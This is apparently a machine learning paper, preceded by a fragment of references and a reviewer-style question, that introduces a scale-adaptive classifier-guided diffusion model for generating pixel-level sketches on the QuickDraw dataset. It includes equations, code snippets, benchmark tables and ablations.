Prafulla Dhariwal and Alexander Nichol. Diffusion models beat gans on image synthesis.
*NeurIPS*, 34: 8780–8794, 2021. Ian Goodfellow, Jean Pouget-Abadie, Mehdi Mirza, Bing Xu, David Warde-Farley, Sherjil Ozair, Aaron Courville, and Yoshua Bengio. Generative adversarial nets. *NeurIPS*, 27, 2014. Amir Hertz, Ron Mokady, Jay Tenenbaum, Kfir Aberman, Yael Pritch, and Daniel Cohen-Or. Prompt-to-prompt image editing with cross attention control. *arXiv preprint arXiv:2208.01626*, 2022. Jonathan Ho and Tim Salimans. Classifier-free diffusion guidance. *arXiv preprint arXiv:2207.12598*, 2022. Jonathan Ho, Ajay Jain, and Pieter Abbeel. Denoising diffusion probabilistic models. In *NeurIPS*, 2020. Jonathan Ho, Chitwan Saharia, William Chan, David J Fleet, Mohammad Norouzi, and Tim Salimans. Cascaded diffusion models for high fidelity image generation. *The Journal of Machine Learning Research*, 23(1): 2249–2281, 2022. Phillip Isola, Jun-Yan Zhu, Tinghui Zhou, and Alexei A Efros. Image-to-image translation with conditional adversarial networks. In *CVPR*, pp. 1125–1134, 2017. Zahra Kadkhodaie and Eero P Simoncelli. Stochastic solutions for linear inverse problems using the prior implicit in a denoiser. In A. Beygelzimer, Y. Dauphin, P. Liang, and J. Wortman Vaughan (eds.), *NeurIPS*, 2021. URL: https://openreview.net/forum?id=x5hh6N9bUUb Tero Karras, Samuli Laine, and Timo Aila. A style-based generator architecture for generative adversarial networks. In *CVPR*, pp. 4401–4410, 2019. Bahjat Kawar, Michael Elad, Stefano Ermon, and Jiaming Song. Denoising diffusion restoration models. *arXiv preprint arXiv:2201.11793*, 2022a. Bahjat Kawar, Roy Ganz, and Michael Elad. Enhancing diffusion-based image synthesis with robust classifier guidance. *arXiv preprint arXiv:2208.08664*, 2022b.
5xadJmgwix
The authors mentioned that vector-based approaches are inherently limited when tackling intricate and complex sketches. I would like to understand why pixel-based methods have an advantage over vector-based methods. I hope the authors can provide some intuitive explanations.
SCALE-ADAPTIVE DIFFUSION MODEL FOR COMPLEX SKETCH SYNTHESIS

Jijin Hu¹, Ke Li¹*, Yonggang Qi¹, Yi-Zhe Song²

¹Beijing University of Posts and Telecommunications, CN
²SketchX, CVSSP, University of Surrey, UK

{jijinhu,like1990,qiyg}@bupt.edu.cn, [email protected]

ABSTRACT

While diffusion models have revolutionized generative AI, their application to human sketch generation, especially in the creation of complex yet concise and recognizable sketches, remains largely unexplored. Existing efforts have primarily focused on vector-based sketches, limiting their ability to handle intricate sketch data. This paper introduces an innovative extension of diffusion models to pixel-level sketch generation, addressing the challenge of dynamically optimizing the guidance scale for classifier-guided diffusion. Our approach achieves a delicate balance between recognizability and complexity in generated sketches through scale-adaptive classifier-guided diffusion models, a scaling indicator, and the concept of a residual sketch. We also propose a three-phase sampling strategy to enhance sketch diversity and quality. Experiments on the QuickDraw dataset showcase the potential of diffusion models to push the boundaries of sketch generation, particularly in complex scenarios unattainable by vector-based methods.

1 INTRODUCTION

The field of diffusion models (Ho et al., 2020; Song et al., 2020a,b; Dhariwal & Nichol, 2021; Ho & Salimans, 2021) has seen remarkable progress, pushing the boundaries of generative AI and enabling the generation of high-quality images across diverse domains (Meng et al., 2021; Choi et al., 2021; Rombach et al., 2022; Poole et al., 2022; Wang et al., 2023). However, this surge of advancements has largely overlooked the unique challenge posed by human sketch generation: a task demanding the creation of complex sketches that maintain a delicate balance between conciseness and recognizability. Recent endeavors in this direction have predominantly centered on vector-based sketches (Ha & Eck, 2018; Chen et al., 2017; Zang et al., 2021). Unfortunately, these vector-based approaches, while suitable for simpler sketches, grapple with inherent limitations when tackling intricate and complex sketch data (Das et al., 2022; Wang et al., 2022).

In this paper, we embark on an ambitious endeavor to harness the full potential of diffusion models by extending their capabilities into the realm of pixel-based sketch generation. Our overarching goal is to demonstrate their prowess in generating complex sketches that strike the perfect balance: concise yet highly recognizable. Determining the appropriate level of complexity in sketch generation has long been considered a formidable challenge, primarily due to the inherent variability in line structures within sketches. To address this challenge, we adapt a conventional classifier-guided pipeline (Dhariwal & Nichol, 2021) specifically for sketch generation. However, this transition is not without its difficulties, as we quickly encounter a significant hurdle: the conventional designs, meticulously fine-tuned for photo generation, do not seamlessly transfer to the intricate realm of sketch creation (as illustrated in Figure 1). As we delve deeper into this problem space, we uncover a compelling revelation, one that diverges from the well-established principles governing photography.
In the realm of photos, higher scale values often correlate with increased fidelity (Dhariwal & Nichol, 2021; Ho & Salimans, 2021). However, in the context of sketch generation, we encounter a fascinating phenomenon that we term "over-sketching" (as depicted in Figure 1(a)). When working with larger scale values, we witness the emergence of repetitive strokes, overlaying previously rendered lines and ultimately compromising the quality of the generated sketches. Addressing this issue proves challenging, as there exists no universal scale choice suitable for diverse sketch categories. Moreover, adopting smaller scales may result in insufficient recognizability, a trade-off that is also undesirable.

*Correspondence to: Ke Li ([email protected]). Code to be found at GitHub page.

Figure 1: (a) Vanilla constant-scale classifier-guided sketch sampling suffers from either insufficient recognizability or over-sketching. In addition, there is no universal scale that is suitable for all categories. (b) Sketches generated by our model are highly recognizable and more visually appealing.

Our paramount contribution, therefore, revolves around the development of a specialized classifier-guided diffusion model meticulously crafted for the domain of sketches. At its core, our model introduces a dynamic sampling scale selector. This selector grapples with the intricate task of determining the optimal scale for each distinct sketch while ingeniously sidestepping the issue of over-sketching. This delicate equilibrium ensures that our generated sketches strike the perfect harmony between recognizability and complexity. This strategy pivots around two integral components that work in tandem: a scaling indicator and a residual sketch. The residual sketch offers us a nuanced perspective on the influence of classifier guidance by tracking how the generated sketch evolves, pixel by pixel, under varying scale choices. This empowers us to pinpoint the scale where the residual sketch best aligns with the scaling indicator, thereby optimizing the entire generation process.

To further elevate the quality of our generated sketches, we introduce two supplementary design elements. Firstly, we demonstrate the effectiveness of commencing the generation process with a few unconditional sampling steps. This initial phase allows the rough structure of the sketch to take form, amplifying the diversity of the generated sketches by maximizing mode coverage. Secondly, we address the gradual attenuation of classifier gradients as the sampling deepens. To counteract this, we strategically implement an early-stop mechanism within our scale adaptive sampling. This seamless transition back to unconditional denoising accelerates the process while concurrently refining the generation results by eliminating noisy pixels.

Our contributions can be summarized as follows: (i) We introduce scale adaptive classifier-guided diffusion models tailored for pixel-based sketch generation, replacing the conventional fixed gradient scale approach and achieving high-quality sketch generation. (ii) We present a novel scaling indicator that optimizes classifier guidance based on recognizability and complexity, complemented by the innovative concept of the residual sketch, enabling fine-tuned control of the generation process in raw pixel space for improved sketch quality.
(iii) Our three-phase sampling strategy, comprising shape and structure construction, scale adaptive sampling for class-specific sketches, and denoising, significantly enhances sample diversity and quality by removing background clutter. These contributions collectively advance the state-of-the-art in sketch generation with diffusion models.

2 RELATED WORK

**Sketch Generation.** Synthesizing human sketches is an appealing task that has received increasing attention in recent years. Early studies (Song et al., 2018; Wang et al., 2018; Li et al., 2019b; Yu et al., 2020) and more recent works (Chan et al., 2022; Wan et al., 2022) focused on the problem of image-to-sketch generation, to help understand and mimic how humans perceive and represent the visual world using sketches. Another line of work, however, concentrates on how to better capture the sequential features in human sketches within a single domain, involving RNN-based (Ha & Eck, 2018; Su et al., 2020; Chen et al., 2017), GAN-based (Ge et al., 2020; Liu et al., 2019), and graph-based (Xu et al., 2021; Yang et al., 2021b) approaches. These models typically adopt a sequence decoder, i.e., an LSTM or Transformer, to explicitly capture the geometric structure of the sequential points represented as coordinates or parametric Bézier curves (Das et al., 2020). As a result, sketch generation is formed as an autoregressive process. Most recently, diffusion models (Das et al., 2022; Wang et al., 2022) have been leveraged to directly learn the distribution of points' coordinates in a non-autoregressive manner, thereby advancing the generation of complex sketches. Instead of using the sequential representation of stroke points, we seek to train diffusion models on raster sketches composed of pixel grids to generate high-quality sketches. An additional property of pixel-based diffusion modeling is that the classifier gradients (Dhariwal & Nichol, 2021) can be conveniently applied as guidance, without retraining the unconditional diffusion models or requiring extra differentiable rasterization rendering.

**Guided Diffusion Models.** There is a large body of literature on controllable generation using diffusion models. The pioneering work ADM (Dhariwal & Nichol, 2021) allows image generation conditioned on a class label by adding the classifier gradients to the frozen unconditionally trained diffusion model. Later, a classifier-free approach (Ho & Salimans, 2021) was proposed to avoid separately training the classifier while achieving similar sample quality, thereby triggering plenty of work on text-conditional image synthesis, e.g., Stable Diffusion (Rombach et al., 2022), DALL-E 2 (Ramesh et al., 2022), GLIDE (Nichol et al., 2022), and Imagen (Saharia et al., 2022), to name a few. More broadly, the latest works expand the scope of conditions to different modalities via cross-attention or adapters with CLIP, such as segmentation masks (Gafni et al., 2022), sketches (Voynov et al., 2023), and many others (Zhang & Agrawala, 2023; Mou et al., 2023). Our work differs from previous works in that the strength of the classifier guidance is dynamically determined to manage line complexity and improve the realism of the produced sketches.

### 3 BACKGROUND

On a high level, diffusion models can sample data from a simple Gaussian distribution by reversing noisy data gradually in multiple steps. The framework typically consists of two inverse processes, i.e., the forward for diffusion and the backward for denoising.
**Diffusion and Denoising.** The forward process is a predefined diffusion process \( q \), which gradually adds Gaussian noise to a real image \( x_0 \), resulting in noisier versions \( x_{1:T} \). It is formally defined as \( q(x_t|x_{t-1}) = \mathcal{N}(x_t; \sqrt{1 - \beta_t}x_{t-1}, \beta_t I) \), where \( 0 < \beta_t < 1, t = 1 \ldots T \) is a predefined variance schedule that specifies the noise level of \( x_t \). The backward process is a denoising function \( p_\theta \), where a neural network is trained to produce slightly clearer data \( x_{t-1} \) from \( x_t \) at each timestep. Given \( p_\theta \), we can sample from pure noise \( x_T \) and sequentially produce samples \( x_{T-1}, x_{T-2}, \ldots \) until reaching \( x_0 \), i.e., a produced sample.

**Learning Objective.** The backward process is also formulated as a Gaussian, i.e., \( p_\theta(x_{t-1}|x_t) = \mathcal{N}(x_{t-1}; \mu_\theta(x_t, t), \Sigma_\theta(x_t, t)) \), where the mean and variance of the Gaussian are parameterized by \( \mu_\theta \) and \( \Sigma_\theta \), respectively. DDPM (Ho et al., 2020) shows that the variance can be set to a time-dependent constant, i.e., \( \Sigma_\theta(x_t, t) = \sigma_t^2 I \); the mean \( \mu_\theta(x_t, t) \) is then reparameterized by a noise approximator \( \epsilon_\theta \), since

$$\mu_\theta(x_t, t) = \frac{1}{\sqrt{\alpha_t}} \left( x_t - \frac{\beta_t}{\sqrt{1-\bar{\alpha}_t}} \epsilon_\theta(x_t, t) \right),$$

where \( \alpha_t = 1 - \beta_t \) and \( \bar{\alpha}_t := \prod_{s=1}^{t} \alpha_s \). Consequently, an alternative training objective \( \|\epsilon_\theta(x_t, t) - \epsilon\|^2 \), i.e., the MSE loss between the true and the estimated noise, is derived for training diffusion models.

**Classifier-guided Sampling.** To generate data conditioned on class labels, a classifier \( p_\phi(y|x_t) \) can be trained on noisy data \( x_t \). The gradient of the classifier, i.e., \( \nabla_{x_t} \log p_\phi(y|x_t) \), is then leveraged to guide the sampling. Specifically, the predicted noise after classifier guidance is:

$$\hat{\epsilon} = \epsilon_\theta(x_t, t) - s \cdot \sqrt{1 - \bar{\alpha}_t} \nabla_{x_t} \log p_\phi(y|x_t), \quad (1)$$

where \( s \) is a manually predefined gradient scale. Class-conditional sampling is then achieved by replacing \( \epsilon_\theta \) with \( \hat{\epsilon} \). It turns out that the scaling factor \( s \) has a significant impact on the generated data, and increasing \( s \) will typically trade off diversity for fidelity (Ho & Salimans, 2021).
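For illustration, Eq. (1) can be realized with a few lines of autograd code. The following is a minimal sketch: `eps_model` and `classifier` are assumed interfaces for the trained noise predictor $\epsilon_\theta$ and the noisy-data classifier $p_\phi$, and `alpha_bar_t` stands for $\bar{\alpha}_t$ at the current timestep.

```python
import torch

def guided_eps(eps_model, classifier, x_t, t, y, s, alpha_bar_t):
    """Classifier-guided noise prediction of Eq. (1)."""
    x_t = x_t.detach().requires_grad_(True)
    log_probs = torch.log_softmax(classifier(x_t, t), dim=-1)
    # grad_{x_t} log p_phi(y | x_t), summed over the batch
    selected = log_probs.gather(1, y.view(-1, 1)).sum()
    grad = torch.autograd.grad(selected, x_t)[0]
    eps = eps_model(x_t, t)
    return eps - s * (1.0 - alpha_bar_t) ** 0.5 * grad
```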
### 4 METHODOLOGY

Our goal is to generate new sketches in pixel format conditioned on class labels using the learned denoising function, i.e., \( p_\theta(x_{t-1}|x_t, y) \), with the DDIM sampler (see Appendix A for more details about DDIM sampling), under the guidance of classifier gradients as described above. In particular, an adaptive scaling strategy is devised to dynamically determine the level of the gradient scale at each time step to improve the quality of the produced sketches. A schematic overview of our model is shown in Figure 2. Details are described in the following.

Figure 2: Schematic overview of our pixel-level sketch generator. There are three sampling phases, i.e., warm-up sampling (phase #1), scale adaptive classifier-guided sampling (phase #2), and end-up denoising (phase #3). Core to our framework is phase #2, which adaptively selects an optimal classifier guidance scale $s$ to encourage better recognizability and avoid over-sketching, thereby boosting sample quality. Essentially, the scale is dynamically determined by matching a scaling indicator and residual sketches at each sampling step. The scaling indicator signals the demand for classifier guidance by predicting the final generation result $x_{0|t}$. The residual sketch measures whether the chosen scale activates proper guidance as the indicator suggests.

### 4.1 Scale Adaptive Classifier-Guided Sampling

Following the standard pipeline for handling natural images, we first train a DDPM on sketch images, i.e., $x_0 \in \mathbb{R}^{H \times W \times 3}$. During generation, as shown in Figure 1, a constant value of the scale $s$ in Eq. (1) leads to sub-optimal quality of the produced sketches, suffering from either insufficient recognizability or over-sketching. Therefore, a scale adaptive sampling strategy is developed to overcome these issues. Specifically, at each intermediate sampling step $t$, a scaling indicator is used to penalize the guidance strength when the complexity and recognizability of the expected produced sketch $x_{0|t}$ are already sufficiently high. A residual sketch image $x_{rs}$ then explicitly measures the impact of any gradient scale, by leveraging the visual difference of $x_{0|t}$ before and after performing the guidance. The scale is then optimized by a differentiable matching module that encourages the residual sketch to conform to the scaling indicator, thereby steering the generation accordingly. In the following, we formally define each key module.

**Scaling Indicator.** High recognizability and proper complexity are two crucial properties that make the produced sketches informative and visually appealing. Therefore, we empirically define a scaling indicator combining these two factors:

$$\zeta(x_t) = \gamma \cdot \exp(\alpha \cdot (1 - c(x_{0|t})) - \beta \cdot f(x_{0|t})), \quad (2)$$

where $x_{0|t} = (x_t - \sqrt{1 - \bar{\alpha}_t} \cdot \epsilon_\theta(x_t, t))/\sqrt{\bar{\alpha}_t}$, and $c(x_{0|t})$ and $f(x_{0|t})$ are scalars denoting the complexity and the recognizability of the expected produced sketch $x_{0|t}$, respectively. Specifically, the stroke complexity $c(x_{0|t})$ is heuristically defined as the fraction of stroke pixels on the whole canvas: $c(x_{0|t}) = \frac{1}{HW} \sum_{HW} \|x_{0|t}\|_0$. The recognizability $f(x_{0|t})$ is given by the probability of the estimated produced sketch $x_{0|t}$ being classified into the conditional class $y$, i.e., $f(x_{0|t}) = p_\phi(y|x_{0|t})$, where the classifier $p_\phi$ is parameterized by $\phi$ and trained on noisy sketches. Intuitively, the scaling indicator $\zeta(x_t)$ signals the demand for classifier guidance. For example, a high level of either complexity or recognizability yields a small $\zeta(x_t)$, suggesting a stop sign for applying the classifier guidance. In contrast, a large $\zeta(x_t)$ implies that classifier guidance is needed. $\alpha$ and $\beta$ are used to balance the effects of \( c(x_{0|t}) \) and \( f(x_{0|t}) \). In the following, we show how to optimize the scale \( s \) according to the scaling indicator by introducing the residual sketch.
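A minimal sketch of Eq. (2) is given below. The hard $\ell_0$ pixel count for $c(x_{0|t})$ is relaxed to a simple threshold test (the 0.1 cut-off is our assumption), and `classifier(x, t)` is again an assumed interface returning class logits.

```python
import torch

def scaling_indicator(x0_t, classifier, y, t, alpha=1.0, beta=0.2, gamma=0.02):
    """Scaling indicator zeta(x_t) of Eq. (2) for a batch of predicted x_{0|t}."""
    gray = x0_t.abs().mean(dim=1)                  # average over RGB channels
    c = (gray > 0.1).float().mean(dim=(-2, -1))    # fraction of stroke pixels
    probs = torch.softmax(classifier(x0_t, t), dim=-1)
    f = probs.gather(1, y.view(-1, 1)).squeeze(1)  # recognizability p_phi(y | x_{0|t})
    return gamma * torch.exp(alpha * (1.0 - c) - beta * f)
```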
**Residual Sketch.** To measure the impact of classifier guidance on \( x_{0|t} \), i.e., the estimated final-step sketch \( x_0 \) based on the current sample \( x_t \), we compare the two versions of \( x_{0|t} \) before and after performing the classifier guidance, i.e., \( x_{0|t} \) and \( \hat{x}_{0|t} \). Namely, a residual sketch \( x_{rs} \) is developed to represent the per-pixel differences between \( x_{0|t} \) and \( \hat{x}_{0|t} \). Formally, \( x_{rs} \) is defined as follows:

$$x_{rs}(x_t, s) = |M(\hat{x}_{0|t}) - M(x_{0|t})|, \quad (3)$$

where \( M(\cdot) \) is a Sigmoid function that transforms a sketch (pixel values are first averaged across the RGB channels) into a soft binary mask in \( \mathbb{R}^{H \times W} \), i.e., most of the pixel values are projected near zero or one. The absolute value \( |\cdot| \) ensures that the entries of \( x_{rs} \in \mathbb{R}^{H \times W} \) are all positive.

**Scale Optimization.** Here, we show how to optimize the gradient scale \( s \) according to the scaling indicator at each sampling step. Basically, this is achieved by enforcing the residual sketch \( x_{rs} \) to be synchronized with the scaling indicator \( \zeta(x_t) \). Intuitively, \( x_{rs} \) should be an empty mask if \( \zeta(x_t) \) suggests a stop sign for applying the classifier guidance. Otherwise, \( x_{rs} \) should be richly painted if \( \zeta(x_t) \) is large, indicating guidance in high demand. Therefore, an optimization objective can be formulated as follows:

$$L_t(s) = \frac{1}{2} \sum_{i=1}^{N} \left( \zeta(x_t^{(i)}) - \frac{1}{HW} \sum_{HW} x_{rs}(x_t^{(i)}, s) \right)^2, \quad (4)$$

where \( N \) is the number of sketches generated within a sampling batch, and \( L_t(s) \) is the mean squared error between the scaling indicator \( \zeta(x_t) \) and the global average pooling of the residual sketch \( x_{rs}(x_t, s) \). Stochastic gradient descent (SGD) is employed to obtain the optimal value of \( s \) at each timestep \( t \) by minimizing \( L_t(s) \).

### 4.2 Warm-up Sampling for Diversity Expansion

Prior works (Dhariwal & Nichol, 2021; Ho & Salimans, 2021) reveal that increasing the strength of the classifier guidance can improve sample precision (i.e., fidelity), but at the cost of recall, i.e., degraded diversity of the generation. We show that beginning with a few unconditional sampling steps as a warm-up can considerably alleviate this issue, i.e., boost the diversity of the generated samples. An empirical principle is applied to determine how many unconditional sampling steps are conducted for the warm-up. The idea is to carry out unconditional generation until the overall structure has been shaped. To achieve this, we simply measure whether the classification probability of the top-1 class, i.e., \( p_\phi(c_{1st}|x_{0|t}) \), exceeds that of any other class by a pre-defined margin \( \eta \). Therefore, the end step \( t_w \) of the warm-up sampling is set by:

$$t_w = t, \quad \text{if } p_\phi(c_{1st}|x_{0|t}) - p_\phi(c_{2nd}|x_{0|t}) > \eta \quad (5)$$

### 4.3 End-up Unconditional Denoising

We observe that as the sampling goes on, the classifier gradient gradually vanishes and almost has no effect afterwards. Therefore, we early-stop the classifier-guided sampling when the expected \( x_{0|t} \) at timestep \( t_d \) is sufficiently recognizable, i.e.,

$$t_d = t, \quad \text{if } p_\phi(y|x_{0|t}) > \xi \quad (6)$$

where \( \xi \) is a threshold that determines the endpoint of the guidance. However, it turns out that the produced sketches are still noisy (i.e., lots of clutter pixels scattered across the image) once the classifier-guided sampling is ceased at the cut-off point \( t_d \). We find that continuing to progress unconditional denoising until the end (i.e., the pre-defined total number of DDIM sampling steps) eventually produces sketches with clean backgrounds.
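Putting Eqs. (2)-(4) together, one sampling step's scale optimization can be sketched as below. It reuses the hypothetical `guided_eps` and `scaling_indicator` helpers from the earlier sketches; the iteration count and learning rate are illustrative, not the paper's settings.

```python
import torch

def optimize_scale(x_t, t, y, eps_model, classifier, alpha_bar_t, iters=10, lr=0.1):
    """Fit the guidance scale s at step t by matching the pooled residual
    sketch of Eq. (3) to the scaling indicator, i.e., minimizing Eq. (4)."""
    to_x0 = lambda e: (x_t - (1.0 - alpha_bar_t) ** 0.5 * e) / alpha_bar_t ** 0.5
    with torch.no_grad():
        x0 = to_x0(eps_model(x_t, t))                  # unguided x_{0|t}
        zeta = scaling_indicator(x0, classifier, y, t) # Eq. (2), held fixed
    s = torch.rand((), requires_grad=True)             # randomly initialized scale
    opt = torch.optim.SGD([s], lr=lr)
    for _ in range(iters):
        x0_hat = to_x0(guided_eps(eps_model, classifier, x_t, t, y, s, alpha_bar_t))
        # residual sketch: difference of soft binary masks, Eq. (3)
        x_rs = (torch.sigmoid(x0_hat.mean(1)) - torch.sigmoid(x0.mean(1))).abs()
        loss = 0.5 * ((zeta - x_rs.mean(dim=(-2, -1))) ** 2).sum()  # Eq. (4)
        opt.zero_grad()
        loss.backward()
        opt.step()
    return s.detach()
```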
## 5 Experiments

### 5.1 Experimental Setup

**Dataset.** QuickDraw, currently the largest doodle dataset with 345 common object categories, is adopted for model training and evaluation. In our experiments, a small subset of 30 categories¹ is first randomly chosen to facilitate a thorough yet easier comparison with the baseline methods. Meanwhile, our model is also trained on the complete 345 classes and compared with a few top-performing generative models to validate the scalability of our approach.

**Competitors.** There are two categories of baseline methods based on the representation of the sketches: vector-based and raster-based. Vectorized sketch generation competitors include SketchRNN (Ha & Eck, 2018), SketchHealer (Su et al., 2020), SketchAA (Yang et al., 2021a), SketchKnitter (Wang et al., 2022), and ChiroDiff (Das et al., 2022). Due to the lack of existing raster-based sketch generation approaches, three strong image generation models, i.e., StyleGAN2 (Karras et al., 2020), DDIM (Song et al., 2020a)², and classifier-free diffusion guidance (CFDG) (Ho & Salimans, 2021)³, are employed as alternatives for comparison.

**Evaluation metrics.** Several standard metrics, including FID, precision, and recall, are leveraged for evaluation. Fréchet Inception Distance (FID) is widely used to measure the fidelity of the RGB images produced by generative models. To tailor it as a reasonable measurement for sketches, the same Inception-V3 network is employed but further finetuned on the QuickDraw dataset for classification. The obtained customized Inception-V3 is then utilized as a feature extractor to calculate the distance between the generated samples and the real data. Precision and recall are typically adopted by diffusion models to validate the quality and mode coverage of the generated samples. We follow Nichol & Dhariwal (2021) and employ the improved precision and recall metrics (Kynkäänniemi et al., 2019) to assess the generation results.

**Language Aligned Expressivity.** We additionally propose to utilize CLIP-Score (Radford et al., 2021) to measure the expressiveness of the generated sketches. Intuitively, the produced sketches should express similar visual concepts to real sketches. In practice, CLIP-Score is leveraged to measure the distance between the generated sketches and the text descriptions of real ones, where the text descriptions are sourced by manually summarizing the visual content in the QuickDraw dataset. More specifically, five captions are constructed for each category under the template "this is a sketch of X", where X is either a coarse or fine-grained linguistic caption, e.g., X = "a girl's face with two pigtails". A full list of the captions is attached in Appendix E. A pre-trained CLIP model ViT-L/14 (Dosovitskiy et al., 2021) is then used to extract the features of the generated sketches and the pre-defined descriptions using the image encoder and text encoder, respectively. The CLIP-Score is then defined as the averaged similarity between the generated sketches and their closest captions. Given the CLIP-Score, we further propose a CLIP-Fine score which measures whether the retrieved top-1 captions are fine-grained or not.
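As an illustration of the metric, a minimal CLIP-Score computation using OpenAI's `clip` package might look as follows; the caption matching follows the description above (closest caption per sketch, then averaged), while the exact preprocessing used in the paper may differ.

```python
import clip
import torch

@torch.no_grad()
def clip_score(sketch_images, captions, device="cuda"):
    """Mean similarity between generated sketches and their closest captions.

    sketch_images: list of PIL images of generated sketches.
    captions: list of hand-written "this is a sketch of X" descriptions.
    """
    model, preprocess = clip.load("ViT-L/14", device=device)
    imgs = torch.stack([preprocess(im) for im in sketch_images]).to(device)
    txts = clip.tokenize(captions).to(device)
    fi = model.encode_image(imgs)
    ft = model.encode_text(txts)
    fi = fi / fi.norm(dim=-1, keepdim=True)
    ft = ft / ft.norm(dim=-1, keepdim=True)
    sims = fi @ ft.t()                             # cosine similarity matrix
    return sims.max(dim=-1).values.mean().item()   # closest caption, then average
```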
**Implementation details.** The same U-Net proposed in ADM (Dhariwal & Nichol, 2021) is employed as the noise predictor, and 10k sketches per category (batch size 64) from the training set are used to train our model for 200k iterations. The default size of the produced sketches is set to $64 \times 64$. Four Nvidia 3090 GPUs are used, and the learning rate is set to $1 \times 10^{-4}$. An EMA rate of 0.9999 is adopted to stabilize the training. The default parameters are $\alpha = 1.0$, $\beta = 0.2$, and $\gamma = 0.02$ in Eq. (2), which are determined on a validation set through greedy search (see Appendix B for more details). We set $\eta = 0.2$ in Eq. (5) and $\xi = 0.5$ in Eq. (6) empirically. During generation, the DDIM sampler is adopted and the total number of steps defaults to 250. We can produce a batch ($N = 128$) of sketches by simply calculating the average values of $\zeta(x_t)$ and $x_{rs}(x_t, s)$ within the batch, hence updating the loss $L_t(s)$ into a batch version accordingly. Using a shared scale within a batch dramatically reduces the computation cost and speeds up the sampling. Additionally, we use an asymmetric reverse process (Kwon et al., 2023) to improve the controllability of classifier guidance, i.e., we compute $x_{t-1}$ using the predicted noise before and after performing the guidance together.

### 5.2 Results

**Quantitative Results.** As shown in Table 1, our model outperforms other competitors on all metrics except precision (ours achieves the second best). Interestingly, pixel-based generation methods (i.e., StyleGAN2, DDIM, and ours) clearly beat vector-based approaches. Additionally, our model achieves the highest CLIP-Score, indicating that the sketches produced by our model best align with the visual content of real sketches. Notably, a higher CLIP-Fine score (i.e., 55.5%) implies that our model tends to produce richer visual content. Some examples of the generated sketches and the retrieved captions are shown in Figure 1-4, showcasing how our generated sketches align with the captions summarized from the real sketches.

---
¹ fish, umbrella, apple, moon, shoe, cloud, candle, vase, chair, sun, cat, airplane, spider, car, pig, bus, face, yoga, butterfly, mosquito, lion, television, basket, barn, angel, pizza, book, grapes, fireplace, cake
² The guidance scale for DDIM is set to 0.4, determined by greedy search, offering its best FID score.
³ The optimal guidance strength $\omega$ of CFDG is set to 2 for sketch generation.

Table 1: Quantitative comparison results on the QuickDraw dataset. The best and second best are color-coded in red and blue, respectively.

| Model | Random 30 Categories | | | | | 345 Categories | | |
|---------------|------|-------------|----------------|-------|------|------|-------|------|
| | FID↓ | CLIP-Score↑ | CLIP-Fine (%)↑ | Prec↑ | Rec↑ | FID↓ | Prec↑ | Rec↑ |
| SketchRNN | 8.15 | 0.59 | 52.67 | 0.37 | 0.22 | 10.32 | 0.26 | 0.24 |
| SketchHealer | 5.85 | 0.63 | 51.51 | 0.67 | 0.12 | – | – | – |
| SketchAA | 5.98 | 0.59 | 50.41 | 0.51 | 0.17 | – | – | – |
| SketchKnitter | 7.05 | 0.55 | 43.15 | 0.41 | 0.19 | – | – | – |
| ChiroDiff | 4.75 | 0.59 | 53.16 | 0.64 | 0.18 | 3.17 | 0.58 | 0.25 |
| StyleGAN2 | 4.12 | 0.67 | 53.39 | 0.55 | 0.24 | 2.93 | 0.63 | 0.27 |
| DDIM | 4.08 | 0.67 | 54.19 | 0.71 | 0.30 | 2.85 | 0.74 | 0.31 |
| CFDG | 3.75 | 0.68 | 54.86 | 0.68 | 0.32 | 2.64 | 0.73 | 0.36 |
| Ours | 3.08 | 0.68 | 55.54 | 0.68 | 0.35 | 2.51 | 0.72 | 0.39 |

Figure 3: (a) Qualitative comparison results. (b) More generation results by our model.

**Qualitative Results.** Some qualitative results are shown in Figure 3. From Figure 3(a), we can observe that: (i) sketches generated by our model are of better quality in terms of expressiveness, see the drawn whiskers of the cat.
(ii) Our method is also capable of depicting objects with more details, see the drawn antennae of a butterfly and the window of a car by our model, while these subtle parts are absent from the sketches obtained by other baseline methods. (iii) The sketches produced by our method are more visually appealing and recognizable, e.g., the eyes and nose on the human face are more vividly portrayed, and the overall visual appearance of the lion is better and more identifiable. More samples generated by our approach can be found in Figure 3(b) and Appendix E. We also visualize an example of the sketch generation process in Figure 4 to better understand the effects of the different sampling phases. We can observe that the overall shape of the expected sketch is formed during the warm-up sampling. The scale adaptive guidance sampling instantiates the generation according to the classifier guidance, yielding a sketch of the desired class that fits the overall shape formed in the previous stage. The last phase (i.e., end-up denoising) is responsible for further refinement.

5.3 Ablation Study

**Computation analysis and sampling acceleration.** The number of denoising steps during generation is squeezed to 250 using the linear selection procedure following DDIM. To test how the selection procedure and the total number of sampling steps trade off the overall generation quality against the computational cost, we compare the results under different settings. Results in Table 2a reveal that the linear procedure is typically better than its quadratic counterpart. More sampling steps lead to improved FID and precision but with slightly reduced recall. However, the computational cost is obviously increased in this case. To accelerate the sampling, we will later show that the end-up denoising can occupy up to about 86% of the total sampling steps, which can be dramatically shortened.

Figure 4: Visualization of $x_{0|t}$ and $x_t$. (a) The estimated final obtained sketches $x_{0|t}$ at time step $t$ during warm-up sampling (green box). The overall structure has been formed in this phase. (b) Given different class labels, i.e., cat and car, $x_{0|t}$ is gradually transformed into the corresponding sketch object by scale adaptive sampling (red box). The end-up denoising (blue) can further refine the sketches by removing the blur in the background. (c) Sketches generated at different time steps.

Table 2: Ablative studies on applying different (a) skip procedures and (b) sampling phases.

(a) Computation analysis. Acceleration in gray.

| Procedure | Steps | FID↓ | Prec↑ | Rec↑ | Speed (s)↓ |
|-----------|-------|------|-------|------|------------|
| Quadratic | 100 | 18.85 | 0.58 | 0.48 | 0.86 |
| Linear | 100 | 4.95 | 0.62 | 0.48 | 0.90 |
| Quadratic | 250 | 5.54 | 0.61 | 0.32 | 1.87 |
| Linear | 250 | 3.08 | 0.68 | 0.35 | 1.90 |
| Shortcut | 67 | 3.30 | 0.67 | 0.36 | 0.98 |

(b) Effect of each sampling phase.

| Model Variant | FID↓ | CLIP-Score↑ | Prec↑ | Rec↑ | Speed (s)↓ |
|------------------------|------|-------------|-------|------|------------|
| No Warm-up | 3.22 | 0.63 | 0.69 | 0.32 | 2.87 |
| No Adaptive | 3.54 | 0.62 | 0.67 | 0.42 | 3.07 |
| Full Guidance | 4.08 | 0.67 | 0.71 | 0.30 | 3.27 |
| No End-up Denoising | 3.24 | 0.62 | 0.68 | 0.25 | 5.74 |
| Our Full Model | 3.08 | 0.68 | 0.68 | 0.35 | 1.90 |

**Effect of each sampling phase.** There are three phases in order during sampling, i.e., the warm-up sampling, the scale adaptive sampling, and the end-up denoising sampling.
